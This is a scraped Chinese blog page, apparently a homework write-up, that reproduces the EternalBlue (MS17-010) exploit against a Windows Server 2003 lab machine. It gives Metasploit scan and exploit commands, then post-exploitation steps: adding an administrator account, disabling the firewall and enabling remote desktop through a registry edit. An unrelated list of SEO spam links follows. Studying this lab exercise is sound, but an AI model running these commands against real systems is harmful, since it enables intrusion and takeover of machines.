当前位置: 首页 > news >正文

专业做面膜的网站/seo课培训

专业做面膜的网站,seo课培训,万能浏览器破解版,实用又有创意的设计永恒之蓝——windows server 2003 漏洞 作业参考 作业参考2 一、永恒之蓝简述: 永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于, 不法分子通过改造…

永恒之蓝——windows server 2003 漏洞

作业参考

作业参考2

一、永恒之蓝简述:

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

二、SMB协议简述:

SMB(全称是Server Message Block)是一个协议服务器信息块,它是一种客户机/服务器、请求/响应协议,通过SMB协议可以在计算机间共享文件、打印机、命名管道等资源,电脑上的网上邻居就是靠SMB实现的;SMB协议工作在应用层和会话层,可以用在TCP/IP协议之上,SMB使用TCP139端口和TCP445端口。

三、SMB工作原理:

1、首先客户端发送一个SMB negport 请求数据报,,并列出它所支持的所有SMB的协议版本。服务器收到请求消息后响应请求,并列出希望使用的SMB协议版本。如果没有可以使用的协议版本则返回0XFFFFH,结束通信;

2、协议确定后,客户端进程向服务器发起一个用户或共享的认证,这个过程是通过发送SessetupX请求数据包实现的。客户端发送一对用户名和密码或一个简单密码到服务器,然后通过服务器发送一个SessetupX应答数据包来允许或拒绝本次连接;

3、当客户端和服务器完成了磋商和认证之后,它会发送一个Tcon或TconX SMB数据报并列出它想访问的网络资源的名称,之后会发送一个TconX应答数据报以表示此次连接是否接收或拒绝;

4、连接到相应资源后,SMB客户端就能够通过open SMB打开一个文件,通过read SMB读取文件,通过write SMB写入文件,通过close SMB关闭文件。

四、复现漏洞

1、启动msf:msfconsole

 

这样就成功进入了msf中,如果你的界面与该界面不同,不必诧异,msf每次都会有一个随机的界面

2、查看数据库连接情况:在msf命令提示符下:db_status(下面的msf命令提示符也说明了已经进入了msf中)。

3、搜索ms17_010:search ms17_010          

4、使用命令:use auxiliary/scanner/smb/smb_ms17_010

5、show options   //输入options来获得帮助命令

RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描

6、set rhosts 192.168.197.128 //扫描靶机(windows 2003 )

7、run 或者 exploit //开始执行扫描

出现以上情况,存在漏洞 即445端口开放

漏洞利用

1、use exploit/windows/smb/ms17_010_psexec    //windows 2003 的攻击模块

2、set  rhosts  172.17.9.228

3、run  或者 exploit  //开始攻击

 4、shell控制

Kali操控server 2003

1、添加用户net user 用户名 密码 /add
命令:net user ccq 123456 /add

 

2、查看本地用户信息:
命令: Net user

net loaclgroup Administrators ccq2003 /add

确认添加成功,并提升至管理员权限

3、关闭防火墙
命令:netsh firewall set opmode mode=disable

查看防火墙状态:
netsh firewall show state

4、查看开启的端口
命令:netstat -ano

 

5、开启3389端口(如果3389没有开启)
命令:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

查看 3389 端口
命令:netstat -aon | findstr “3389”

 6、远程桌面连接

 

http://www.jmfq.cn/news/4857283.html

相关文章:

  • wordpress跳转外链/西安优化排名推广
  • 苏州网站建设制作服务商/产品推广方法
  • 开源建站系统cms/谷歌代运营
  • 网站建设公司出路/怎么自己建立网站
  • chn域名网站/长春百度seo公司
  • 有口碑的武进网站建设/推广注册app拿佣金
  • 政务网站开发/搜索引擎优化的方法
  • 默认网站停止/页面seo是什么意思
  • 温州建设集团网站首页/企业网络组网设计
  • 网站群建设规划方案/特色产品推广方案
  • 企业网站制作开发/seo的实现方式
  • 事业单位网站建设方案/预防电信网络诈骗
  • 如何做餐饮的网站/百度竞价
  • html电影网页设计实例代码/浙江短视频seo优化网站
  • seo网站推广优化费用/乱码链接怎么用
  • 服装网站建设价格/营销渠道名词解释
  • 商城网站开发解决方案/蜜雪冰城网络营销案例分析
  • 一个企业做网站的目的/怎么做网站
  • 菠菜导航网站可以做/百度信息流怎么做效果好
  • wordpress 建站模板/优秀网站seo报价
  • wordpress城市插件/北京百度搜索排名优化
  • 网站后台登陆图片/深圳seo关键词优化
  • 怎样创建网站直播接口/搜一搜搜索
  • 个人网站怎么做口碑/西安百度关键词优化排名
  • 云南省住房和城乡建设厅官方网站/长春seo培训
  • 怎么用frontpage做网站/推广赚钱平台
  • 资产管理公司网站建设方案/阿里巴巴seo排名优化
  • 网站qq客服制作/关键字搜索引擎
  • wordpress关注/seo编辑是干什么的
  • 常用知名购物网站/seo如何优化图片